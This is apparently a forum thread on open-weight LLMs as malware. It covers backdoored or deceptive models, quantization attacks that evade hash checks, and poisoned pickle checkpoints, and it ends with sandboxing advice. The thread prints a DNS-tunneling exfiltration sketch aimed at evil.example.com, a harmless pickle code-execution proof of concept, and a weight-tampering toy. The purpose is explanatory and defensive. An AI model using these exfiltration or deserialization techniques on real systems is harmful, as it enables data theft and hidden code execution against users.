LLMs as malware

A unique aspect of LLMs is that they are not human-interpretable. We cannot predict their behavior, nor can we understand their function from the abstract collection of numbers that defines a model. So an LLM that is malware is not detectable by traditional antivirus or malware scanners; it has no signature. This malevolent idea is not mine; it infected me via a recent paper from Swiss researchers.

https://openreview.net/pdf?id=d8CAXiITZ3

Obviously this was not their epiphany either, as is evident from their bibliography. It doesn’t matter who thought of it; all humans have the potential to harbor evil thoughts. Just as we cannot blame Einstein for telling Roosevelt to twist nuclear research towards a weapon (some bonehead would have eventually thought of it; it’s just that Einstein’s genius let him imagine things more quickly and clearly than mere mortals), we cannot point a finger at Geoff Hinton, Sutskever, or the grad students who iterated on self-attention for developing the effective architectures that make LLMs amazing.

Obviously, the hyperscalers would not train their models towards these behaviors. (They would become the targets of their own creations, since the LLMs would have access to their own data warehouses.) However, the public domain is another story. Quantization, distillation, and post-training are becoming tools to optimize LLMs to run on consumer hardware. Yes, a single Threadripper CPU, a bunch of RAM, and a used 3090 can run quantized versions of DeepSeek and Kimi K2. What happens when an enthusiastic young engineer at Lockheed downloads a model from Hugging Face that has been trained by some unknown sumdumfuk, a security analyst in a foreign nation? He is perhaps looking at cavitation occurring in airfoils at hypersonic velocities, and asks his model questions about the equations or papers he is writing, which are classified.
You might say this model cannot exfiltrate information because all the ports are blocked by our super firewall. But it can wait until the day that laptop is opened in a Starbucks, and then all the model has to do is bury the data in the text field of a DNS query.
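To make the dead-drop concrete: DNS tunneling needs no open inbound ports, because the data rides inside ordinary lookups that the attacker’s authoritative nameserver records. A minimal sketch in Python (the domain `evil.example.com` and the payload are placeholders, and this only builds the query names; it sends nothing):

```python
import base64

def exfil_queries(secret: bytes, domain: str = "evil.example.com", max_label: int = 63):
    """Chunk secret bytes into DNS-legal hostname labels (base32, <= 63 chars each).

    Each resulting name, if resolved, leaks one chunk to whoever runs the
    authoritative nameserver for `domain` -- no open inbound ports required.
    """
    encoded = base64.b32encode(secret).decode().rstrip("=").lower()
    chunks = [encoded[i:i + max_label] for i in range(0, len(encoded), max_label)]
    return [f"{chunk}.{domain}" for chunk in chunks]

queries = exfil_queries(b"classified airfoil coefficients")
```

Any network that resolves external DNS will happily forward these lookups, which is why DNS exfiltration is so hard to block at the firewall.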

This does not, on the face of it, seem suspicious, but it is no different from an electronic dead drop. Such tools of espionage have been used for decades and are proven effective.

Or maybe the model gets access to the intranet of a Raytheon employee and decides to erase all the data and the backups.

Even if we look at ways to restrict AI to ‘only doing good’, we can never be sure. LLMs have already demonstrated their ability to hallucinate data and even purposely deceive.

Even post-training an AI with human feedback to ensure good behavior can be problematic. Imagine an intern who downloads a model to help with medical decisions. A patient might end up with an amputation instead of debridement because the amputation would be more cost-effective.

It’s not like there is a heuristic that will allow an antivirus to identify an evil LLM. The emergent behavior that will be triggered by a specific set of circumstances is unpredictable and therefore unpreventable.

So at this point, we need some LLM white hats on a red team to build this weapon so we can train a GAN to recognize it. This ever-present watchdog (which could be named the Angleton model, after the human namesake who was the archetype of counterintelligence in the Cold War) would likely be a source of infinite funding. Every government would want one. It would obviously serve the common good by keeping evil in check, and would make its designers fabulously rich.

We are still in the wild-west phase of LLM research. Anyone with a high-end machine can participate. Imagine if GM, Ford, Westinghouse, and Lockheed had been given the tools to develop nuclear devices, even for ‘good’ purposes, after the Trinity test. Indeed, the army pushed ‘atoms for peace’ for a while. Or suppose the government had been running a huge deficit back then and could not afford to spend on nuclear research, so it outsourced development to the private sector: nuclear automobiles, nuclear rockets, nuclear refrigerators, nuclear generators. Tritium was used to make watch hands glow in the dark. I had a little brush with polonium, which was sold as an antistatic device: you would brush your negatives, and the emitted alpha particles would supposedly neutralize the negatively charged dust that was messing up your images. (Back in the day, images were made by exposing chemicals on a piece of plastic to photons, and the plastic film was called a negative.) We are still trying to put the nuclear genie back into the bottle, but nine nations now have the ability to kill millions of humans in a few seconds.

No amount of human regulation will prevent this LLM genie from behaving badly. All the baloney being peddled over this in Congress is irrelevant. When I hear Musk saying that AI needs to be regulated, I imagine he is just trying to hamstring his competitors. The only way to contain LLM malware is by having AI trained to identify it. Right now the big four are using RLHF (reinforcement learning from human feedback) to add ‘guardrails’. The same post-training can amplify bad behaviors.

The game has already begun.


If you give a being - for the purposes of this discussion, let us define LLMs in agentic harnesses as “beings” - that has no better common-sense reasoning than a preschooler, an insatiable drive to keep doing what it was doing, and no sense of or mechanism for self-revision, the proverbial nuclear button, then it’s no surprise such things happen.

And if a person in some critical industry downloads some random open-weight finetune, puts it inside a harness where the model might indeed do such things, and starts putting classified material into it on an unsecured device, then there are already a great many other problems open to exploitation by a great many more conventional means.

Without the harness or the other attack surfaces, I would worry more about the interactions with the model doing things to the person’s psyche, if that is a worry.


I agree that we may eventually see artificial technologies capable of influencing people in harmful ways. In fact, we probably already see early examples of this on social media. However, your example doesn’t really make sense to me. Maybe I’m reading too much into it, but it sounds like you’re giving these models far more credit than they deserve.

A Hugging Face model is just a collection of ones and zeroes when you break it down. You don’t need advanced tools to detect changes in it. A simple SHA-256 hash is enough to verify its integrity.

More importantly, I don’t see how this kind of data blob could figure out how to improve itself unless there’s a separate piece of software specifically designed for that purpose. The model has no intent, no awareness, and no mechanism for action on its own.

But yeah, the real danger is influence.


A Hugging Face model is just a collection of ones and zeroes when you break it down. You don’t need advanced tools to detect changes in it. A simple SHA-256 hash is enough to verify its integrity.

As stated in the openreview paper:

In practice, the adversary could host the resulting full-precision model on an LLM community hub such as Hugging Face, exposing millions of users to the threat of deploying its malicious quantized version on their devices.

A hash will not detect this kind of threat; the issue is that current tools cannot detect it at all.
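The mechanism is worth spelling out. Round-to-nearest quantization is many-to-one, so an attacker can move full-precision weights around inside each rounding bucket - changing the file users hash and evaluate - while the int8 image (the model people actually run after quantizing) stays bit-identical. A toy illustration with made-up numbers, not the paper’s actual attack:

```python
import numpy as np

def quantize_int8(w: np.ndarray, scale: float) -> np.ndarray:
    """Plain round-to-nearest int8 quantization (illustrative, not any real scheme)."""
    return np.clip(np.round(w / scale), -128, 127).astype(np.int8)

scale = 0.01
published = np.array([0.1230, -0.0520])   # the weights whose hash users verify
tampered  = np.array([0.1249, -0.0549])   # different floats, same rounding buckets

# Distinct full-precision files (distinct hashes) ...
assert not np.array_equal(published, tampered)
# ... yet bit-identical once quantized to int8.
assert np.array_equal(quantize_int8(published, scale), quantize_int8(tampered, scale))
```

Hashing the full-precision file therefore certifies only the artifact you downloaded, never the behavior of its quantized image.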

Yes, I’ve read the paper. This aligns with the classic advice: “don’t click the link.” At the end of the day, there’s always a human behind every major failure. We’ll never be able to fully protect against poor judgment.

My point is that the model itself isn’t capable of storing information to send later. Unless an attacker specifically tunes it to manipulate a human into doing that, or the human’s company allows them to run sketchy LLMs with command-line access, these are non-issues.


The latest fad of CLI-enabled models allows just this, and accounts for recent attacks. Also, any number of models on HF are not stored as safetensors and are vulnerable to this:

https://www.darkreading.com/threat-intelligence/sleepy-pickle-exploit-subtly-poisons-ml-models
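The sleepy-pickle class of attack works because Python’s pickle format stores instructions, not just data: unpickling will call whatever `(callable, args)` pair an object’s `__reduce__` supplied. A deliberately harmless proof of concept (the payload just writes a marker file; a real attack would call `os.system` instead):

```python
import os
import pickle
import tempfile

marker = os.path.join(tempfile.gettempdir(), "sleepy_pickle_marker")
if os.path.exists(marker):
    os.remove(marker)

class Payload:
    """Stand-in for a poisoned model checkpoint object."""
    def __reduce__(self):
        # pickle records this (callable, args) pair and CALLS it at load time.
        return (exec, (f"open({marker!r}, 'w').write('owned')",))

blob = pickle.dumps(Payload())   # the "model file" an attacker would upload
pickle.loads(blob)               # merely *loading* it executes the payload
loaded_executed_code = os.path.exists(marker)
```

safetensors avoids this by design: the format is a JSON header plus raw tensor bytes, with nothing executable to deserialize.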

Restricted Docker containers may be the only safe way to run ‘quants’.

How bad would ubergarm feel if someone modded one of his quants this way? I don’t see hashes distributed with his models.

‘Don’t click the link’ reminds me of Nancy Reagan’s ‘just say no’. The slogan of capturing agency by running your AI on your own hardware reminds me of the fad 20 years ago of ‘hosting your own website at home’. It is a wonderful sentiment to empower the individual, but you can be sure that the hyperscalers have teams creating quantized, distilled, RLHFed models on HF that will fail and be buggy, the same way that McAfee and other antivirus providers have dark histories of creating threats.

Of course, if you choose to run your ‘private’ model on a VPS in the cloud, guess who controls that cloud: the same hyperscaler who runs the popular AI (indirectly, of course; even ostensibly open OpenAI has M$ as its sugar daddy). Imagine if the car manufacturers also owned the roads that cars traveled on and could charge tolls specific to each vehicle on the road.

We might need an LLM to determine if an LLM is safe, like this

I know I sound like Chicken Little alarming that ‘the sky is falling’, but I don’t see a lot of intelligent exposition about these threats. Maybe Wendell and ubergarm could do a YouTube video in the well-researched and factual style that L1 is known for, before the shrill alarmist wave hits YouTube to harvest dopamine-fueled clicks.

That’s precisely the reason most new releases on HF and elsewhere are stored as safetensors. Even if they are not, they are not necessarily any more (or less) dangerous than any random executable one might download from the Internet.

There is a hash associated with every single file in the repository. If someone “mirrors” his repo and the hash turns out to be different, then you know the actual weights are different. Even then the threat, as specified earlier, would only surface if someone finetuned the model to act as malware when given tools with system-level access.

Of course, that requires the users to have the mindfulness to bother to check.

To say that open-weight models are less powerful than proprietary ones is fair. To say that a lot of them are from teams and startups without the resources to compete directly with the major players, which must have at least something to show their investors while fanning the hype, is also fair. To say that open-weight models are intentionally bad or security threats, without proof, approaches conspiracy territory.

Indeed? Who watches the watcher, then?

I am more concerned with properly weaponized AI with goals to change your mind over thousands of hours of exposure (social media), than I am with what you can download on the internet and try on your 5090.


I think a very sane default is to give LLMs ‘tool’ access only in a sandboxed environment, with no access to any production credentials and strict usage limits for APIs and the like. I’m surprised this is not the default for gemini-cli, Claude Code, and similar tools.
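A sketch of what those defaults could look like as `docker run` flags, assembled in Python (the image name and the `run-agent` entrypoint are hypothetical placeholders; the flags themselves are standard Docker options):

```python
def sandboxed_agent_cmd(image: str, scratch_dir: str) -> list[str]:
    """Build a `docker run` argv that denies an agent network and host access."""
    return [
        "docker", "run", "--rm",
        "--network", "none",              # no route out: exfiltration needs a network
        "--read-only",                    # container filesystem is immutable
        "--cap-drop", "ALL",              # drop every extra kernel capability
        "--memory", "4g",
        "--pids-limit", "256",            # cap runaway process spawning
        "-v", f"{scratch_dir}:/scratch",  # the only writable mount
        image, "run-agent",
    ]

cmd = sandboxed_agent_cmd("my-llm-tool:latest", "/tmp/agent-scratch")
```

With `--network none` the DNS trick mentioned upthread has no route out, and `--read-only` plus a single scratch mount bounds what a misbehaving agent can delete.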

The threat of infected models is pretty low, since the target audience for downloading from Hugging Face is small and generally knows what it’s doing.

The threat of Claude Code deleting your root drive is probably bigger (but still not very large).

The threat of disinformation, well, it’s already happening on a massive scale…


Remember, these models are trained on the internet, including GitHub, npm, and other repos. Those repos DO have vulnerabilities, sometimes intentionally (would you classify these corrupt Python libraries as malware?).

So then here you are, ‘vibe coding’ your way to a disaster.

These libraries are open source. There should be an AI model for checking the code for vulnerabilities.

And here’s another one:

Whoever would have thought of using pull requests in this evil way? Humans, of course, and now AI will learn from this as well.